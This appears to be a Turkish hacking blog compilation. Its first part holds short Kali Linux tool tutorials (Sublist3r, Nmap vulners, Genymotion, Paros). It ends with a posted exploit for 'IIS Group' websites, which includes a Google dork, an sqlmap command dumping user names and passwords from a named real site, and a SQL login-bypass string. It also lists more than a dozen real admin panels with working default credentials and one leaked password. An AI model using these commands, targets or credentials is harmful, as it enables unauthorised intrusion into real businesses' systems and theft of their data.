-->

Kali Linux Sub Domain Search Sublist3r

Selamu Aleyküm..

Sublist3r, OSINT kullanan web sitelerinin alt alanlarını numaralandırmak için tasarlanmış bir python araçtır. Penetrasyon test cihazları ve hata avcılarının hedefledikleri alan adına alt alanlar toplamaları için yardımcı olur. Sublist3r, Google, Yahoo, Bing, Baidu ve Ask gibi birçok arama motorunu kullanan alt alanları numaralandırır. Sublist3r ayrıca Netcraft, Virustotal, ThreatCrowd, DNSdumpster ve ReverseDNS'yi kullanarak alt alanları numaralandırır.

Kurulum : 
git clone https://github.com/aboul3la/Sublist3r.git
Yada: apt update && apt -y install sublist3r

Önerilen Python Sürümü:
Sublist3r şu anda Python 2 ve Python 3'ü desteklemektedir .

Python 2 için önerilen sürüm 2.7.x'dir.
Python 3 için önerilen sürüm 3.4.x'dir.

Windows'ta Kurulum:
c:\python27\python.exe -m pip install -r requirements.txt

Linux'ta Kurulum : 
sudo pip install -r requirements.txt

Kullanim : 

Kısa form Uzun Form Açıklama
-d --domain Alt etki alanlarını numaralandırmak için alan adı
-b --kaba kuvvet Zayıf bruteforce modülünü etkinleştir
-p --ports Bulunan alt alanları belirli TCP portlarına karşı tarayın
-v --verbose Ayrıntılı modu etkinleştirin ve sonuçları gerçek zamanlı olarak görüntüleyin
-t --İş Parçacığı Subtribute bruteforce için kullanılacak thread sayısı
-e --engines Virgülle ayrılmış arama motorları listesi belirtme
-O --çıktı Sonuçları metin dosyasına kaydedin
-h --yardım et yardım mesajını göster ve çık

Genel Komut: python sublist3r.py -d kali.org -t 3 -e bing
Video:

Kali Linux 2017.3 Telegram İnstall

Selamun Aleyküm ..

Dowloand: https://desktop.telegram.org/
Get Telegram For Linux 64 Bit

cd Telegram
chmod +x Telegram
./Telegram

Video:

Nmap Script Vulners.nse

Selamun Aleyküm..

Açıklama
Güvenlik açıkları hakkında bilgi vermek için iyi bilinen bazı servisleri kullanan NSE komut dosyasıdir.

Bagımlılıklar :
nmap libraries:
     http
     json
     string
          
Aklınızda tutmanız gereken tek şey, senaryonun elinde bulunan yazılım sürümlerine sahip olmasıdır; bu nedenle yalnızca -sV bayrağıyla çalışır.

scripti usr/share/nmap klasorundekı script dosyasına vulners.nse olarak kayıt edıyorsunuz...

Dowlonad: https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/README.md
Kullanim: 
nmap -sV --script vulners <target>


Kali Linux Android Emülatör Kurulumu Genymation

Selamun Aleyküm..

Genymotion programı, Android’i Desktop cihazlara taşıyan bir emülatördür. Yani Genymotion’ı indirerek bilgisayarınızda sanal bilgisayar oluşturabilir, program içerisindeki dosyaların kurulumu gerçekleştirerek bilgisayarınızda Android işletim sistemi yüklü sanallaştırılmış mobil cihaz kullanmaya başlayabilirsiniz.

İçerisinde Android KitKat, Lollipop, Marshmallow, Nougat versiyonları ve Nexus, Samsung, Sony Xperia ve tablet modellerini barındırıyor. Android Pentest İçin ideal bir emülatör.

Not: Üye olmanız gerekmektedir + virtualbox'un kurulu olması lazım.

Video;


Kali Linux Paros Website Vulnerability Scanner

Selamun Aleyküm...

Intro  - "Paros" Proxy, web uygulamalarının güvenliğini değerlendirmek isteyen kişiler için yazılmıştır. Paros'un proxy niteliği sayesinde, çerezler ve form alanları da dahil olmak üzere, sunucu ve istemci arasındaki tüm HTTP ve HTTPS verileri engellenebilir ve değiştirilebilir.

Paros , Web Uygulaması Denetleme, test etme ve hata ayıklama için, ücretsiz Java tabanlı bir araçtır. Bu konuda, Paros'un birçok kullanımının sadece birkaçı gösterilecektir. Paros'un proxy özelliği, bir tarayıcıya gelen ve bu tarayıcıdan gelen trafiği denetlemek açısından çok değerlidir. Bu, geliştiricilerin ve denetçilerin, çerezlerin nasıl ayarlandığı, bir tarayıcıya yönlendirilen yönlendirmeler ve tarayıcıdan sunucuya gönderilen sorgular gibi web uygulama mimarilerinin çeşitli yönlerini araştırmalarını sağlar. Paros bazı otomatik tarama araçlarını içeriyor olsa da, bunlar oldukça zayıf ve Paros, neyi arayacağını bilen yetenekli bir penetrasyon test aracidir. (HTTP / HTTPS proxy. On-the-fly HTTP, XSS, SQL Enjeksiyonlari vb..)

Video: 

Begenip abone olmayı unutmayın..

IIS Group Admin Panel Bypass And Sql İnjection Vulnerability



[CODE]#################################################################################
# Exploit Title: IIS Group Admin Panel Bypass And Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Powered by IIS Group"
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 20.12.2017
# Vendor Home: http://www.iisgroup.co.za/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################

Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] /admin/
[+] /admin/login.asp
[+] Sql GET parameter 'cat' is vulnerable

Command:root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10  --random-agent --text-only  --no-cast  -u "http://www.deville.co.za/products.asp?cat=35"  -T users -C id,name,pw --dump

Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=35 AND 8346=8346

Demo: Sql:
http://www.deville.co.za/products.asp?cat=35'===> admin  dv147
http://www.adval.co.za/online.asp?controller=news&view=all&id=1'
http://www.iisgroup.co.za/admin/login.asp?error=1'
===>
http://www.mactool.co.za/admin/login.asp ===> '=''or' 
http://superfloral.info/admin/login.asp ===> '=''OR'

Username:  admin   Password: admin
Username: '=''or'  Password: '=''or'

http://absolutecars.co.za/admin/online.asp ===> admin admin
http://www.thehosevan.co.za/admin/online.asp ===> admin admin
http://www.fluidco.co.za/admin/online.asp ===> admin admin
http://www.burma.co.za/cms/index.php  ===> admin admin
http://farsa.biz/admin/login.asp ===> admin admin
http://fundisa-academy.com/admin/online.asp ===> admin admin
http://efpglobal.com/admin/online.asp ===> admin admin
http://biscuitmanufacturers.co.za/admin/login.asp ===> admin admin
http://www.fluidco.co.za/admin/online.asp ===> admin admin
http://www.360businessparks.com/admin/online.asp ===>  admin admin
http://www.360storagesolutions.co.za/admin/online.asp ===> admin admin
http://www.thehosevan.co.za/admin/online.asp ===> admin admin

http://viewdns.info/reverseip/?host=196.44.35.90&t=1 Choose Random Target

FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR!

Greet'Zzz : ABIKANBEY & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen
[/CODE]